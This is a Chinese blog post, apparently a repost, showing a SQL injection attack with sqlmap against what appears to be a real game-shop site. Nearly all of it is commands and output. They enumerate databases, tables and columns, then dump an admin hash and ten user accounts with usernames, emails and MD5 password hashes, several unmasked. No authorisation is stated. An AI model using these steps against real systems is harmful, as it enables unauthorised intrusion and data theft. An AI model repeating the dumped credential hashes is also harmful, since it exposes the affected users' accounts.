root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs

available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#當前數據庫

current database:??? 'dnweb'

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#當前數據庫用戶
current user:??? 'root@localhost'

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列數據庫表名

Database: dnweb
[25 tables]
+-----------------+
| account???????? |
| admin_user????? |
| base??????????? |
| chajian???????? |
| chongzhi??????? |
| duihuan???????? |
| libao_jilu????? |
| libao_list????? |
| meirilibao????? |
| meirilibao_jilu |
| mianfei???????? |
| mianfei_list??? |
| money_name????? |
| role_dellist??? |
| roleid????????? |
| server????????? |
| shop_list?????? |
| shop_list_copy? |
| shop_tag??????? |
| tuiguang??????? |
| xiaofei???????? |
| zhuce?????????? |
| zkfcn?????????? |
| zkfcq?????????? |
| zkfwp?????????? |
+-----------------+

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名

Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column???? | Type??????? |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name，admin_pass " -T "admin_user" -D "dnweb"
#列數據

Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass?????????????????????? |
+------------+----------------------------------+
| lok** ? ? ?| a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+

Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column???? | Type???????? |
+------------+--------------+
| createtime | datetime???? |
| dlts?????? | int(11)????? |
| email????? | varchar(255) |
| gold?????? | int(10)????? |
| id???????? | int(10)????? |
| jifen????? | int(10)????? |
| lastip???? | varchar(16)? |
| logintime? | datetime???? |
| lxdl?????? | int(11)????? |
| money????? | int(10)????? |
| money2???? | int(10)????? |
| name?????? | varchar(32)? |
| namemd5id? | varchar(32)? |
| password?? | varchar(32)? |
| regip????? | varchar(16)? |
| security?? | varchar(32)? |
| tg???????? | int(10)????? |
| tg2??????? | int(10)????? |
| tingyong?? | int(11)????? |
| vip??????? | int(255)???? |
+------------+--------------+

+-------+------------+-------------+----------------------------------+----------+
| id??? | email????? | name??????? | password???????????????????????? | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350* ? ? | a414409798? | cee4fce6eaa87581421c296cbc0d3064 | NULL???? |
| 11828 | 000000???? | lo*** ? ? ? | 670b14728ad9902aecba32e22fa4f6bd** | NULL???? |
| 11829 | 8888*?????? | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL???? |
| 11830 | 123456???? | 203412594* ?| cfd40caa535bb51378ab60849bb54486 | NULL???? |
| 11831 | 123456789? | na101* ? ? ?| e10adc3949ba59abbe56e057f20f883e | NULL???? |
| 11832 | NULL?????? | hyt100* ? ? | 4c49c824492864666980b012bcf17d08 | NULL???? |
| 11833 | 32312* ? ? | hehe52121* ?| 0733f98f76375074a3424d5b6e8ffd68 | NULL???? |
| 11834 | 123456789* | fong201* ? ?| 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL???? |
| 11835 | 123456???? | q50504* ? ? | e10adc3949ba59abbe56e057f20f883e | NULL???? |
| 11836 | 1*????????? | wf199* ? ? ?| 96e79218965eb72c92a549dd5a330112 | NULL???? |
+-------+------------+-------------+----------------------------------+----------+

轉載于:https://www.cnblogs.com/staffyoung/p/5424421.html

總結

以上是生活随笔為你收集整理的某网SQL注入漏洞实战的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。